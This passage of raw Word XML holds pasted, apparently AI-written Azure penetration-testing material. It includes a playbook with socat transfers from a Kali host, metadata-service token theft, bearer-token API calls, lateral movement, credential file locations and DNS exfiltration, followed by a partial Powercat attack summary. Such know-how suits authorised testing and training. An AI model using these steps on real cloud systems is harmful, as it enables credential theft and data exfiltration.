        <w:t>socat TCP4-LISTEN:443,fork FILE:payload.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2A638" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>From target VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590FB910" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>socat TCP4:&lt;kali-ip&gt;:443 FILE:payload.sh,create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B8B6E" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="5CDC4A85">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4660D506"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3: Azure Metadata Service Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD92DC3" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Steal credentials from Azure instance metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD3881" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>On compromised VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D7C36" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>curl http://169.254.169.254/metadata/identity/oauth2/token?... -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Metadata:true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57030B2B" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="0A23C4E9">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD04B83"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4: Exploiting Managed Identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EDA0BB" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Use access tokens from metadata service to access Azure APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3BEBFE" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Use token to access Azure services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD942BD" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>curl -H "Authorization: Bearer &lt;access_token&gt;" https://management.azure.com/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E25A33" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="1945C409">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB3502"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5: SSH </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for Internal Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D8FCE" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Secure access to internal services via compromised VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2291E6" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>From Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F440A03" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">ssh -L 8080:127.0.0.1:80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>azureuser@target-vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1040C652" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="247E5940">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004F83B"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6: Lateral Movement in Azure VNet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B3AB00" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Move between VMs using peering, shared subnet, or common credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB40859" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Enumerate with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B12729" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243807DE" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>sP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>vnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>-subnet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14929D6D" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="1E32A6C5">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AE26E7"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7: Extracting Azure Credentials and Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F17509F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>From Linux VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CC265" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>~/.azure/ and /etc/azure/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A8657" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>VSCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>settings.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> and tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054095CB" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>From Windows VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF4C96" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>DPAPI secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE9E70A" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Azure CLI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>accessTokens.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A514E96" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="1834A817">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C40B62B" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Module 8: Exfiltration via Common Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59997C1E" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Use socat, curl, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> to exfil over:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B6556" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>HTTP (port 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB774C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:lastRenderedPageBreak/>
        <w:t>HTTPS (443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C7D8C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>DNS (if covert exfil needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C391CA7" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="372129A3">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="660D26BB" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>I can deliver this as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193BBB6" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📄</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> PDF Playbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B94FE8C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> Markdown GitHub-style Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF61AFF" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🖥️</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> Printable one-pager cheat sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576962F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>Would you like me to start generating the full Markdown and PDF versions of the playbook now?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341BA152" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRDefault="00EC435D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208084E4" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRDefault="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E1C6D5" w14:textId="0F894D21" w:rsidR="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Powercat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15696D5A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRDefault="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DAEBD66" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRDefault="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DECBB9B" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">Sure! Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concise, corrected, and polished summary</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> of your external penetration testing report for an Azure Cloud Environment using Powercat — focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how the tool can be used to attack Azure, what Azure vulnerabilities or services it targets, and how exploitation occurs</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE61428" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="29298F50">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA01D1E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary: External Penetration Testing of Azure Cloud Environment Using Powercat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89F8E4" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E195F" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">Powercat is a PowerShell-based Netcat implementation widely used by red teams for low-level network communication, including port scanning, file transfer, shell access, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>. It is lightweight (~68 KB), portable, and often bypasses traditional antivirus detection, making it an effective tool for penetration testing and exploitation within Azure environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0237C" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="3A6BBC7D">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="321E1AF3" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Attack Techniques Using Powercat on Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC9A05" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD7F11" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Discover open TCP ports on Azure VMs or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0936E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Powercat attempts TCP connections to target ports to identify active services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A54BE26" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Attackers can find exposed ports on Azure VMs (e.g., SSH 22, RDP 3389, HTTP 80/443) or on services hosted in Azure subnets, potentially revealing weakly secured endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F93D2" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. File Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A694DC" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Move files between attacker and compromised Azure VMs.</w:t>
      </w:r>
    </w:p>
